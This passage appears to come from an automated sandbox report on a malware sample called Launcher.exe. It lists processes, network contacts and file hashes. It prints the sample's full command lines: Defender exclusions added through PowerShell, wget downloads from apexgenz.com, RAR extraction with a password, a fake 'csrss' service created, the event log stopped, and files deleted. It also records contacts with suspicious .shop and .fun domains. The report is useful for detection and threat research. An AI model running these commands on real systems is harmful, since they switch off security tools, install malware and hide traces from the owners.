a47583f5f | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD | C:\Users\Admin\AppData\Local\Temp\Launcher.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\wget.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\services\winrar.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\plugin0228
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\plugin0228
"C:\Users\Admin\AppData\Roaming\services\plugin0228"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 660 -ip 660
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 660 -s 592
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\2plugin2901
C:\Users\Admin\AppData\Roaming\services\wget.exe
"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "csrss"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\ProgramData\SystemFiles\csrss.exe
C:\ProgramData\SystemFiles\csrss.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\conhost.exe
conhost.exe
C:\Users\Admin\AppData\Roaming\services\winrar.exe
"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Users\Admin\AppData\Roaming\services\3plugin0228
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | solvadordali.com | udp |
| US | 8.8.8.8:53 | 199.29.14.185.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| NL | 185.14.29.199:80 | solvadordali.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apexgenz.com | udp |
| NL | 185.14.29.199:80 | apexgenz.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| NL | 194.87.31.18:3333 | tcp | |
| US | 8.8.8.8:53 | 18.31.87.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | favourlegislatureduei.shop | udp |
| US | 104.21.60.195:443 | favourlegislatureduei.shop | tcp |
| US | 8.8.8.8:53 | technologyenterdo.shop | udp |
| US | 104.21.80.118:443 | technologyenterdo.shop | tcp |
| US | 8.8.8.8:53 | 195.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | detectordiscusser.shop | udp |
| US | 104.21.60.92:443 | detectordiscusser.shop | tcp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | 118.80.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.60.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 172.67.202.191:443 | turkeyunlikelyofw.shop | tcp |
| US | 8.8.8.8:53 | associationokeo.shop | udp |
| US | 172.67.147.18:443 | associationokeo.shop | tcp |
| US | 8.8.8.8:53 | 191.202.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
| MD5 | e5c00b0bc45281666afd14eef04252b2 |
| SHA1 | 3b6eecf8250e88169976a5f866d15c60ee66b758 |
| SHA256 | 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903 |
| SHA512 | 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.dll
| MD5 | 7de0541eb96ba31067b4c58d9399693b |
| SHA1 | a105216391bd53fa0c8f6aa23953030d0c0f9244 |
| SHA256 | 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e |
| SHA512 | e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3 |
C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest
| MD5 | f0fc065f7fd974b42093594a58a4baef |
| SHA1 | dbf28dd15d4aa338014c9e508a880e893c548d00 |
| SHA256 | d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693 |
| SHA512 | 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe |
memory/1436-20-0x0000000002330000-0x0000000002366000-memory.dmp
memory/1436-21-0x00000000733E0000-0x0000000073B90000-memory.dmp
memory/1436-23-0x0000000004DB0000-0x00000000053D8000-memory.dmp
memory/1436-22-0x0000000002380000-0x0000000002390000-memory.dmp
memory/1436-24-0x0000000002380000-0x0000000002390000-memory.dmp
memory/1436-25-0x0000000004D70000-0x0000000004D92000-memory.dmp
memory/1436-26-0x0000000005550000-0x00000000055B6000-memory.dmp
memory/1436-29-0x00000000055C0000-0x0000000005626000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_om4kuejz.jtq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1436-37-0x0000000005730000-0x0000000005A84000-memory.dmp
memory/1436-38-0x0000000005C00000-0x0000000005C1E000-memory.dmp
memory/1436-39-0x0000000005C60000-0x0000000005CAC000-memory.dmp
memory/1436-40-0x0000000006C00000-0x0000000006C96000-memory.dmp
memory/1436-41-0x0000000006110000-0x000000000612A000-memory.dmp
memory/1436-42-0x0000000006160000-0x0000000006182000-memory.dmp
memory/1436-43-0x0000000007470000-0x0000000007A14000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
| MD5 | fea10d11d84919cb9a0a0752d61c0a66 |
| SHA1 | aea3c65e2b62851b2dd112597f28379b49c58a0a |
| SHA256 | 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7 |
| SHA512 | e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll
| MD5 | f58866e5a48d89c883f3932c279004db |
| SHA1 | e72182e9ee4738577b01359f5acbfbbe8daa2b7f |
| SHA256 | d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12 |
| SHA512 | 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177 |
C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest
| MD5 | 1b6de83d3f1ccabf195a98a2972c366a |
| SHA1 | 09f03658306c4078b75fa648d763df9cddd62f23 |
| SHA256 | e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724 |
| SHA512 | e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce |
memory/1564-48-0x00000000733E0000-0x0000000073B90000-memory.dmp
memory/1564-49-0x00000000023B0000-0x00000000023C0000-memory.dmp
memory/1564-60-0x0000000006F50000-0x0000000006F82000-memory.dmp
memory/1564-59-0x000000007F180000-0x000000007F190000-memory.dmp
memory/1564-61-0x000000006FD20000-0x000000006FD6C000-memory.dmp
memory/1564-71-0x0000000006F30000-0x0000000006F4E000-memory.dmp
memory/1564-72-0x0000000006F90000-0x0000000007033000-memory.dmp
memory/1564-73-0x0000000007740000-0x0000000007DBA000-memory.dmp
memory/1564-74-0x0000000007170000-0x000000000717A000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 8c04808e4ba12cb793cf661fbbf6c2a0 |
| SHA1 | bdfdb50c5f251628c332042f85e8dd8cf5f650e3 |
| SHA256 | a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272 |
| SHA512 | 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f |
memory/1564-77-0x00000000072F0000-0x0000000007301000-memory.dmp
memory/1564-78-0x0000000007330000-0x000000000733E000-memory.dmp
memory/1564-79-0x0000000007340000-0x0000000007354000-memory.dmp
memory/1564-80-0x0000000007380000-0x000000000739A000-memory.dmp
memory/1564-81-0x0000000007370000-0x0000000007378000-memory.dmp
memory/1564-84-0x00000000733E0000-0x0000000073B90000-memory.dmp
memory/2180-87-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\winrar.exe
| MD5 | f59f4f7bea12dd7c8d44f0a717c21c8e |
| SHA1 | 17629ccb3bd555b72a4432876145707613100b3e |
| SHA256 | f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4 |
| SHA512 | 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c |
C:\Users\Admin\AppData\Roaming\services\01plugins0228.rar
| MD5 | 907c1e4e19a50fff3ac19087ebe04295 |
| SHA1 | 699187f7bfb7e65d05d445b46f9583c77f519c0e |
| SHA256 | 115c37d38945ee56b0e7a23cf90c60f63191aaf312c207c8ac5ab719a1500158 |
| SHA512 | 5da0d6b688c09d926881512f698ec8d205c08c37eb51f2a18471aa3f99aeb7a771030c170ea933cc67f17852a433359ce9c51fcfcff780cb6d35d78d0eb5e9c7 |
memory/1436-94-0x00000000733E0000-0x0000000073B90000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\plugin0228
| MD5 | 626fb04cdd464c32c07e7a9610f7fb11 |
| SHA1 | cf6d3a911e2b915b52f00777a6bc984f2a26f61a |
| SHA256 | 3d1c1ba663250f344a2a2bc64c294755ec2367d03540cd851485c47a1b858c09 |
| SHA512 | 7fcfb2971e2ccc837af3325cbffa4560afe04d43491ce08524f25659ae78d798c4996764ed1ca56152b7fc65ade16f0e064a6d2a6ffb1f7d818bcc44e761f338 |
memory/636-100-0x0000000000050000-0x00000000000E2000-memory.dmp
memory/1436-99-0x0000000002380000-0x0000000002390000-memory.dmp
memory/1436-102-0x0000000002380000-0x0000000002390000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\wget.exe
| MD5 | 965fd0c9605673d1cfb8fb8ffb798759 |
| SHA1 | df03ad83704d36fb5b3d53af9c67c8ee4094f831 |
| SHA256 | 5750b228374a30df11461a08ea0299a6f0aaee954675e0e7065bd3caf7f748b8 |
| SHA512 | 5045267cb0953bda90b55ece9363894cc60d627560b48873c6dce9b98f8143e76c467d0ed10f0693bb489ac75ea85892892867e0ad4b6225e04c855bddaf3864 |
memory/636-101-0x00000000733E0000-0x0000000073B90000-memory.dmp
memory/660-104-0x0000000000400000-0x000000000046E000-memory.dmp
memory/660-107-0x0000000000400000-0x000000000046E000-memory.dmp
memory/636-108-0x00000000733E0000-0x0000000073B90000-memory.dmp
memory/660-109-0x0000000000400000-0x000000000046E000-memory.dmp
memory/660-111-0x0000000000400000-0x000000000046E000-memory.dmp
memory/4632-114-0x0000000000400000-0x00000000008F2000-memory.dmp
C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
| MD5 | b6a52ee06beb0b11ee53cd40980930b6 |
| SHA1 | 8aeb096bc77a4053fa203d9970a7dbdab6d96acc |
| SHA256 | 889ff22a9e6d555a56558b89cc8d15a33b1aa15cb96f866641314b994a62d8ab |
| SHA512 | 03483d7623de7699174bcaac470e9da8aa098498e7ec2bbce63ebbeeee4cc9f9b922fa7eadffe48eea67c285a0ebcc0f667a87822e3feac8846600f096558c53 |
C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar
| MD5 | 82a56a666981e9e163a1aba74dc70aa8 |
| SHA1 | 709e44e71ff38d0771d839b74f270c23daa42f64 |
| SHA256 | c59448b470702a689cb0525b76d28d68b2436c4f23cac4ee18a32a7a99801eb6 |
| SHA512 | ed02644d9621256b2c0bd43eac5d46f1be3ccf741b3701ff624e0f0913bd6829d818d3006619f90fded694c01940e4fca7b1eac92cd647b87212efd4532ccbe0 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | a29ec45d7487f8bd48fe7de7c1edfc08 |
| SHA1 | bfd200ab0cdc8c69e6527f5ca11b9d337d70f6a6 |
| SHA256 | 7c925465a7b9529e4aa3322c359126f1806315041fab67b18c00e944d3c878ba |
| SHA512 | 75dd06876d2a2e5e630a9cbd80881a66e0754634122fda8383c4d438c71ac82e61b0890ed6409f4992a15e0b6efa92b128e3a5cb93f920391b7d52315981cd41 |
C:\Users\Admin\AppData\Roaming\services\2plugin2901
| MD5 | 5a5a545484abcfd739e596c1ff8753d5 |
| SHA1 | 42543fdc4b7620ba21ba5d27fd4ab45a549eb503 |
| SHA256 | 872b4526efdb11051475cfde82c187adfa80a2496ed9835550c1421a039a203e |
| SHA512 | 7a1516dab7c58455fe687cec52c522aa111d0b454d8c7c390417e134a2e1631a9bd68c71f82c92423dce598244c71c67e7576121e7ea4c931421a3458f798374 |
memory/3468-123-0x00007FF65F9F0000-0x00007FF660385000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\.wget-hsts
| MD5 | a3b99543ec56baedaf5cb1f52098ecbd |
| SHA1 | 720d8b248ac7de1de3da8d7bb98fc1a5cfee2035 |
| SHA256 | 0d43a234c361f1d2ecfc34c38e2ffeb26df4ecab139ec2880c477130a636c998 |
| SHA512 | a628dda78eca2d2a14feeeb1eb23371971c70e1dc08bf0659aa4dc6fb59d9992c76f31f944aaddefec2a4623f440b7b9196dd71d92ed98b776244f9c279d655d |
memory/2548-126-0x00000182F79D0000-0x00000182F79F2000-memory.dmp
memory/2548-127-0x00007FFD75180000-0x00007FFD75C41000-memory.dmp
memory/2548-137-0x00000182F58E0000-0x00000182F58F0000-memory.dmp
memory/2548-138-0x00000182F58E0000-0x00000182F58F0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 41a89395aa79275da39c856d80c0b0e0 |
| SHA1 | 505f53581ce80a5e6bcb64976bb8a88234cf1cc2 |
| SHA256 | 0a5069faf0c7c08d02b1dcc4604d663518fc61b62b5aeba83c6e0e9ec6679042 |
| SHA512 | 0f10075f6b5a42796edeffb968d615e10926b8cbfe1ada1b52b4b1e905c19ef328ed945b005c7514e543e7ba6ea2d0b1ff34d82e1256bd58c99e0f16d416f4e1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
memory/2548-150-0x00000182F7D70000-0x00000182F7D8C000-memory.dmp
memory/2548-151-0x00007FF4B0A10000-0x00007FF4B0A20000-memory.dmp
memory/2548-152-0x00000182F58E0000-0x00000182F58F0000-memory.dmp
memory/2548-153-0x00000182F7ED0000-0x00000182F7EDA000-memory.dmp
memory/2548-154-0x00000182F7EE0000-0x00000182F7EE8000-memory.dmp
memory/2548-155-0x00000182F7EF0000-0x00000182F7EFA000-memory.dmp
memory/2548-158-0x00007FFD75180000-0x00007FFD75C41000-memory.dmp
memory/3468-161-0x00007FF65F9F0000-0x00007FF660385000-memory.dmp
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 6302a06d784d7750b390cf7d4244fabd |
| SHA1 | 3810e71d5b3661964fcd36208958ac8ae3d480d8 |
| SHA256 | 2c97889ea14764179482b240670874ec4b5eea7c05ca4b781f9a24f07d49fade |
| SHA512 | 55187ce666583b668ca2694b4a8e3b96c2202c7854864981c619c7b7ebed2c2a5cbb9ed7064d51a53e9a8cb0e09e092ce4a90ac99f3aac743df393d10a119c8b |
C:\ProgramData\SystemFiles\csrss.exe
| MD5 | 3aec42a40bef937bc6fa5c2d9886649a |
| SHA1 | 6f051beb8277fc06d3bc1337506bbcc36d11805c |
| SHA256 | cb2fb9b92258f7cac02fc31d1d3a57dad81183c537690f6855bf1c8e2e15b500 |
| SHA512 | f1da3e4da0a1a034330e546c2853299836b5d106b7b4532dfffaeaac1f4945961e4b13dab5e5098a9650ee2ed078febd07048cb36ef8fb991a84a1d512888621 |
memory/1076-164-0x00007FF7C7450000-0x00007FF7C7DE5000-memory.dmp
memory/2604-174-0x00007FFD75180000-0x00007FFD75C41000-memory.dmp
memory/2604-175-0x000001CBB0670000-0x000001CBB0680000-memory.dmp
memory/2604-176-0x000001CBB0670000-0x000001CBB0680000-memory.dmp
memory/2604-187-0x000001CBB2A50000-0x000001CBB2A6C000-memory.dmp
memory/2604-186-0x00007FF467D50000-0x00007FF467D60000-memory.dmp
memory/2604-189-0x000001CBB2A70000-0x000001CBB2B25000-memory.dmp
memory/2604-188-0x000001CBB0670000-0x000001CBB0680000-memory.dmp
memory/2604-190-0x000001CBB2B30000-0x000001CBB2B3A000-memory.dmp
memory/2604-191-0x000001CBB2CE0000-0x000001CBB2CFA000-memory.dmp
memory/2604-192-0x000001CBB2CC0000-0x000001CBB2CC6000-memory.dmp
memory/2912-196-0x0000000000400000-0x00000000008F2000-memory.dmp
memory/2604-195-0x000001CBB0670000-0x000001CBB0680000-memory.dmp
memory/2604-199-0x00007FFD75180000-0x00007FFD75C41000-memory.dmp
memory/2632-202-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2632-203-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2632-204-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2632-205-0x0000000140000000-0x000000014000D000-memory.dmp
C:\Windows\system32\drivers\etc\hosts
| MD5 | a4c063b0dcc296275528b8380bac8957 |
| SHA1 | 8b874d826a3894ab1f85a22583d083ee9b9773f3 |
| SHA256 | d723ea40bf7166c410e71577df4bb5d19180791a21ae226c805b9d148f0abcac |
| SHA512 | 2e14bed997b70a22e3cb68c8aabcbbde717f08e327fcbcb6c7b82018d40af589672a9365e4173a744a60213248291230bba2bf4d8f0a2ba83e0e31bc3d7a716a |
memory/2632-206-0x0000000140000000-0x000000014000D000-memory.dmp
memory/2632-209-0x0000000140000000-0x000000014000D000-memory.dmp
memory/4700-210-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-211-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-212-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-213-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/1076-215-0x00007FF7C7450000-0x00007FF7C7DE5000-memory.dmp
memory/4700-217-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-218-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-219-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-220-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-221-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-223-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-225-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-222-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-226-0x0000000140000000-0x0000000140AB6000-memory.dmp
C:\Users\Admin\AppData\Roaming\services\03plugins0228.rar
| MD5 | 8e1a3fef5ef8aed7c5900cfe9dc9e935 |
| SHA1 | 7eb61369cc7a2c0298c52bfd56698b2af46a9765 |
| SHA256 | c9f8bc8cb06605370c3d5da5f84b96817381be9a2f5fc5939b3cc6b43b99a014 |
| SHA512 | 0aca024411e95858cfdb925f6528e9681f5bb6c1d2bf89210b6d61aea9117f069cb683935be4729165825d5beed65611d12f4e586ae00f04008c24f9aec333f7 |
memory/4700-227-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-230-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-229-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-231-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-233-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-234-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-232-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-235-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-236-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-237-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-238-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-239-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-240-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-241-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-242-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-243-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-245-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-246-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-244-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp
memory/4700-248-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-247-0x0000000140000000-0x0000000140AB6000-memory.dmp
memory/4700-249-0x0000000140000000-0x0000000140AB6000-memory.dmp
